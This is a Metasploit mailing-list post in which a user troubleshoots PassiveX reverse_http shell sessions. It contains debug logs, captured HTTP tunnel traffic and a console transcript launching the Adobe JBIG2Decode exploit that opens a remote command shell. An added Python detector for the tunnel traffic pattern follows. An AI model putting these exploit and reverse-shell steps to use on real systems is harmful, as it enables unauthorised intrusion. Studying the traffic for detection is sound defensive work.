Metasploit mailing list archives
problem with passiveX (reverse_http) payloads: nothing in return to commands
From: irian2003 at yahoo.com (Bogdan Sandu)
Date: Fri, 3 Apr 2009 16:04:34 -0700 (PDT)
Here is the output from the log with LogLevel 3:

[04/04/2009 01:55:37] [d(2)] core: windows/shell/reverse_http: Successfully encoded with encoder x86/shikata_ga_nai (size is 501)
[04/04/2009 01:55:38] [d(2)] core: PassiveX listener started on http://0.0.0.0:8081/O1rKpDovm9rJM6SUIjor9EQCsPdDFnLs
[04/04/2009 01:55:50] [d(2)] core: windows/shell/reverse_http: Successfully encoded with encoder x86/shikata_ga_nai (size is 501)
[04/04/2009 01:56:02] [d(3)] core: PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xb6b4b304> Writing 0 to local side
[04/04/2009 01:56:54] [d(3)] core: PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xb6b4b304> Queuing 4 to remote side
[04/04/2009 01:56:54] [d(3)] core: PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xb6b4b304> Flushing remote output queue at 4 bytes
[04/04/2009 01:56:55] [d(3)] core: PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xb6b4b304> Writing 0 to local side
[04/04/2009 01:56:56] [d(3)] core: PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xb6b4b304> Writing 0 to local side

--- On Sat, 4/4/09, Bogdan Sandu <irian2003 at yahoo.com> wrote:

From: Bogdan Sandu <irian2003 at yahoo.com>
Subject: [framework] problem with passiveX (reverse_http) payloads: nothing in return to commands
To: framework at spool.metasploit.com
Date: Saturday, April 4, 2009, 12:53 AM

Hello,

I have a problem with the reverse_http payloads. The exploit succeeds and looking with tcpdump at the traffic between the proxy server and the port of the payload I see the commands being executed, but after interacting with the session I see nothing returned to my commands:

----------------------------
GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive

HTTP/1.1 200 OK
Content-Length: 4
Server: Rex
Connection: close

Dir
------------------------------------
GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive

-----------------------------------
POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Content-Length: 1024
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive

dir
 Volume in drive C has no label.
 Volume Serial Number is 0CAA-3013

 Directory of C:\Documents and Settings\irian\Desktop

04/03/2009 11:43 PM <DIR> .
04/03/2009 11:43 PM <DIR> ..
04/01/2009 10:09 AM 27,136 Activ.doc
02/27/2009 12:09 PM 169,984 carte optional.doc
03/07/2009 12:48 PM 131 jboss.txt
04/02/2009 03:48 AM 288,237 lo.cap
03/30/2009 12:17 PHTTP/1.1 200 OK
Content-Length: 0
Server: Rex
Connection: Keep-Alive

-----------------------------
POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Content-Length: 230
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive

M 247,666 users_guide.pdf
03/25/2009 10:32 PM 24,064 youtube.doc
15 File(s) 2,111,721 bytes
3 Dir(s) 959,123,456 bytes free

C:\Documents and Settings\irian\Desktop>HTTP/1.1 200 OK
Content-Length: 0
Server: Rex
Connection: Keep-Alive

----------------------------------------
msf exploit(adobe_jbig2decode) > exploit
[*] Exploit running as background job.
msf exploit(adobe_jbig2decode) > [*] PassiveX listener started.
[*] Using URL: http://0.0.0.0:8080/carti.pdf
[*] Local IP: http://1.2.3.4:8080/carti.pdf
[*] Server started.
[*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 1.2.3.4:50007...
[*] Sending PassiveX main page to client
[*] Sending PassiveX main page to client
[*] Command shell session 1 opened (Local Pipe -> Remote Pipe)
[*] Sending stage to sid 2 (474 bytes)
msf exploit(adobe_jbig2decode) > sessions -l

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  Local Pipe -> Remote Pipe

msf exploit(adobe_jbig2decode) > sessions -i 1
[*] Starting interaction with 1...
ls
dir
dir

Any ideas why this is happening? Thanks a lot and keep up doing a great job.

Bogdan
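
For anyone reviewing proxy or packet-capture data, the request shape visible in the capture in this message can be matched directly. The following is an added example, not part of the original message and not Metasploit code; it assumes only the indicators seen in this one capture (a 32-character path token, the /tunnel_in and /tunnel_out suffixes, and the X-Sid: sid=<n> header), and its function names and sample requests are constructed for illustration.

```python
import re
from collections import defaultdict

# Indicators read off the capture in this message (not from a protocol spec):
# 32-character path token, /tunnel_in|/tunnel_out suffix, "X-Sid: sid=<n>".
TUNNEL_PATH = re.compile(r"^/([A-Za-z0-9]{32})/tunnel_(in|out)$")
SID_VALUE = re.compile(r"^sid=(\d+)$")

def parse_request_head(raw):
    """Split a raw HTTP request head into (method, path, headers)."""
    lines = [ln for ln in raw.splitlines() if ln.strip()]
    parts = lines[0].split() if lines else []
    if len(parts) != 3:
        raise ValueError("malformed request head")
    headers = {}
    for ln in lines[1:]:
        name, sep, value = ln.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers

def find_tunnel_sessions(raw_requests):
    """Count tunnel-shaped requests per (token, sid)."""
    sessions = defaultdict(lambda: {"in": 0, "out": 0})
    for raw in raw_requests:
        method, path, headers = parse_request_head(raw)
        m = TUNNEL_PATH.match(path)
        s = SID_VALUE.match(headers.get("x-sid", ""))
        expected = {"GET": "out", "POST": "in"}.get(method)  # pairing seen in the capture
        if m and s and m.group(2) == expected:
            sessions[(m.group(1), int(s.group(1)))][expected] += 1
    return dict(sessions)

def bidirectional(sessions):
    """Keys with both polling and posting traffic, the stronger signal."""
    return sorted(k for k, c in sessions.items() if c["in"] and c["out"])

# Constructed sample: three requests shaped like those quoted above and one
# unrelated request. Token and host names are placeholders.
TOKEN = "A" * 32
SAMPLE = [
    "GET /%s/tunnel_out HTTP/1.0\nX-Sid: sid=2\nHost: listener.example:8081\n" % TOKEN,
    "POST /%s/tunnel_in HTTP/1.0\nX-Sid: sid=2\nContent-Length: 1024\n" % TOKEN,
    "POST /%s/tunnel_in HTTP/1.0\nX-Sid: sid=2\nContent-Length: 230\n" % TOKEN,
    "GET /docs/tunnel_out HTTP/1.1\nHost: intranet.example\n",
]

if __name__ == "__main__":
    print(bidirectional(find_tunnel_sessions(SAMPLE)))
```

Requiring both directions for the same token and sid keeps a single stray URL that happens to end in tunnel_out from raising an alert.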